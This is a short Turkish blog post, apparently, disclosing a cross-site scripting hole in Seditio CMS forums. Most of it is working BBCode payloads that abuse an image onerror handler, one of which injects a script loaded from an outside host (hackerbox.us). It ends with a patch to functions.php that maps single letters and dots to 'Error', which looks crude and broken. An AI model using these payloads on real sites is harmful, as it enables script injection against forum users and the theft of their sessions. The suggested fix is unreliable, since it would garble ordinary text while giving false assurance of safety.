Seditio cms sistemlerinde çalışan açık şu şekilde
[t=f.jpg[img]onerror=document.write(”) x=document.jpg[/img]x.jpg]x[img] x=document.jpg[/img]ss.jpg[/t]
Bu kod ascii ile encode yapılırsa çalışmaktadır.
Siz kodu düzenlemek istediğinizde size normal olarak gözükecektir fakat,
forums.php ‘de kod çalışır.
Bu kod ile neler yapılabilir?
Bütün html js kodları çalıştırılabilir..
[t=f.jpg[img]onerror=document.body.appendChild(document.createElement(’script’)).src=’http://www.hackerbox.us’ x=document.jpg[/img]x.jpg]x[img] id=xss x=document.jpg[/img]ss.jpg[/t][t=f.jpg[img]onerror=document.write(”) x=document.jpg[/img]x.jpg]x[img] x=document.jpg[/img]ss.jpg[/t]
Bu açığı kapatmak için şunları yapın.
Functions.php Açın
Bul >$bbcodes = array(
'$' => '$',
Üstüne kaydet >$bbcodes = array(
'$' => '$',
'a' => 'Error',
'w' => 'Error',
'd' => 'Error',
'.' => 'Error',
Hiç yorum yok:
Yorum Gönder